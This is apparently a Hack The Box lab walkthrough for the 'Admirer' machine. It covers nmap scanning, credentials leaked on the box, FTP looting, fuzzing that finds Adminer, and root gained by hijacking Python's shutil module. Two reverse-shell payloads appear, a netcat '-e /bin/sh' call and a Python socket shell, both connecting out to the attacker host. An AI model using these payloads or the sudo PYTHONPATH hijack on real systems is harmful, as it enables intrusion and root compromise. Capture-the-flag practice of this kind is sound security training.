NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-31 21:19 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating Ping Scan at 21:19
Scanning 10.10.10.187 [4 ports]
Completed Ping Scan at 21:19, 0.35s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:19
Completed Parallel DNS resolution of 1 host. at 21:19, 0.58s elapsed
Initiating SYN Stealth Scan at 21:19
Scanning 10.10.10.187 [1000 ports]
Discovered open port 21/tcp on 10.10.10.187
Discovered open port 22/tcp on 10.10.10.187
Discovered open port 80/tcp on 10.10.10.187
Increasing send delay for 10.10.10.187 from 0 to 5 due to 103 out of 257 dropped probes since last increase.
Increasing send delay for 10.10.10.187 from 5 to 10 due to 140 out of 349 dropped probes since last increase.
SYN Stealth Scan Timing: About 41.43% done; ETC: 21:20 (0:00:44 remaining)
Completed SYN Stealth Scan at 21:22, 172.70s elapsed (1000 total ports)
Initiating Service scan at 21:22
Scanning 3 services on 10.10.10.187
Completed Service scan at 21:22, 5.00s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.187
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Retrying OS detection (try #2) against 10.10.10.187
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of -350641 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -350641 microseconds. Ignoring time.
Initiating Traceroute at 21:23
Completed Traceroute at 21:23, 2.03s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:23
Completed Parallel DNS resolution of 2 hosts. at 21:23, 3.49s elapsed
NSE: Script scanning 10.10.10.187.
Initiating NSE at 21:23
Completed NSE at 21:24, 50.50s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 5.01s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Nmap scan report for 10.10.10.187
Host is up (2.0s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
22/tcp open tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open tcpwrapped
Aggressive OS guesses: Android 4.1.1 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), Android 4.1.2 (94%), Android 4.2.2 (Linux 3.4) (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.13 (94%), Linux 4.10 (94%), Linux 4.4 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 3.83 ms 10.10.14.1
2 3.82 ms 10.10.10.187
NSE: Script Post-scanning.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 288.03 seconds
Raw packets sent: 4389 (197.784KB) | Rcvd: 3533 (159.868KB)
PORT 80
Lets move on to robots.txt.
here we have admin-dir available
which is Forbidden .After FUZZING I Got 2 directories:
Contacts
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb
##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb
# Amy
Email: a.bialik@admirer.htb
# Leonard
Email: l.galecki@admirer.htb
#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb
# Bernadette
Email: b.rauch@admirer.htb
# Amy
Email: a.bialik@admirer.htb
# Leonard
Email: l.galecki@admirer.htb
#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb
# Bernadette
Email: b.rauch@admirer.htbCredentials
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!Here we got FTP user and pass!
FTP LOGINS AND ENUMERATION
root@liquid:~/Desktop/HTB/admirerC# ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3405 Dec 02 21:24 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 21:20 html.tar.gz
226 Directory send OK.
ftp> get *
local: credentials.txt remote: *
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> mget *
mget dump.sql?
mget html.tar.gz?
Here we have two files available.After checking both here what we got !!!
html file
root@liquid:~/Desktop/HTB/admirerC/html# ls -la
total 36
drwxr-xr-x 6 root root 4096 May 5 17:52 .
drwxr-xr-x 3 root root 4096 May 29 15:15 ..
drwxr-x--- 6 root www-data 4096 Jun 7 2019 assets
drwxr-x--- 4 root www-data 4096 Dec 3 01:59 images
-rw-r----- 1 root www-data 4613 Dec 4 01:50 index.php
-rw-r----- 1 root www-data 134 Dec 2 03:01 robots.txt
drwxr-x--- 2 root www-data 4096 Dec 2 23:20 utility-scripts
drwxr-x--- 2 root www-data 4096 Dec 2 22:55 w4ld0s_s3cr3t_d1r
utility-scripts directory is interesting
After going through that we got another web directory to check
utility-scripts
root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# ls -l
total 16
-rw-r----- 1 root www-data 1795 Dec 2 23:18 admin_tasks.php
-rw-r----- 1 root www-data 401 Dec 2 03:58 db_admin.php
-rw-r----- 1 root www-data 20 Nov 30 2019 info.php
-rw-r----- 1 root www-data 53 Dec 2 23:10 phptest.php
We have number of files here some of them have passwords and all.But Here we came to know one thing that we have database here!!
lets FUZZ directories after utility-scripts
root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# wfuzz -w /usr/share/wordlists/big.txt -u http://admirer.htb/utility-scripts/FUZZ.FUZ2Z -z list,php --hc 403,404 -c
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://admirer.htb/utility-scripts/FUZZ.FUZ2Z
Total requests: 20592
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000001873: 200 51 L 235 W 4156 Ch "adminer - php"
Here we got adminer.php
Now we need exploit!!
After googlefu I got a website !!
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
Here we have exploit for adminer!!
For that we need to create user and its own database for that!!
Here Are the links for creating user and database
After creating database here we have login like this !!
root@liquid:~/Desktop/HTB/admirerC# mysql -u new adminer -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 59
Server version: 10.3.22-MariaDB-1 Debian buildd-unstable
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [adminer]>
Then login to adminer.php
Lets try to access /etc/passwd file!
but we will get error as Path error!
So lets try to access index.php which was just one directory back
Here We go!!
Again with some Passwords!!
SSH WALDO USER ACCESS
root@liquid:~/Desktop/HTB/admirerC# ssh waldo@10.10.10.187
waldo@10.10.10.187's password:
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun May 31 17:18:37 2020 from 10.10.14.185
waldo@admirer:~$ id
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
GETTING ROOT ACCESS
Lets use basic command to check!!
waldo@admirer:~$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo@admirer:~$
After running that script and using cat command I came to know that it is running every option available. here in that directory we have 2 Files !!
waldo@admirer:/opt/scripts$ ls -l
total 8
-rwxr-xr-x 1 root admins 2613 Dec 2 20:36 admin_tasks.sh
-rwxr----- 1 root admins 198 Dec 2 20:36 backup.py
waldo@admirer:/opt/scripts$
Here we see that backup file is running function make_archive and also importing it from shutil which is python lib!! this backup file is backing web part as option 6!! what if we add our own lib path and our own lib name shutil and it will backup file using our library we just made as reverse shell which will be executed ny root as it is owned by root
waldo@admirer:~/liquid$ cat shutil.py
import os
def make_archive(a,s,d):
os.system("nc 10.10.14.140 9003 -e /bin/sh")
waldo@admirer:~/liquid$
Now lets add this path in python and run the script!!
but remember to open listener first!!
waldo@admirer:~/liquid$ sudo PYTHONPATH=~/liquid /opt/scripts/admin_tasks.sh
[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...
<br>
Here we got root access!!
root@liquid:~/Desktop/HTB/admirer# nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.140] from (UNKNOWN) [10.10.10.187] 46778
root@admirer:/home/waldo/liquid# cd
cd
root@admirer:~# id
id
uid=0(root) gid=0(root) groups=0(root)
NOTE : here we can use another python code to get shell as i did above :
waldo@admirer:~/liquid$ cat shutil1.py
import os
import pty
import socket
lhost = "10.10.14.140"
lport = 9002
ZIP_DEFLATED = 0
class ZipFile:
def close(*args):
return
def write(*args):
return
def __init__(self, *args):
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
BEST WRITE UP EVER SEEN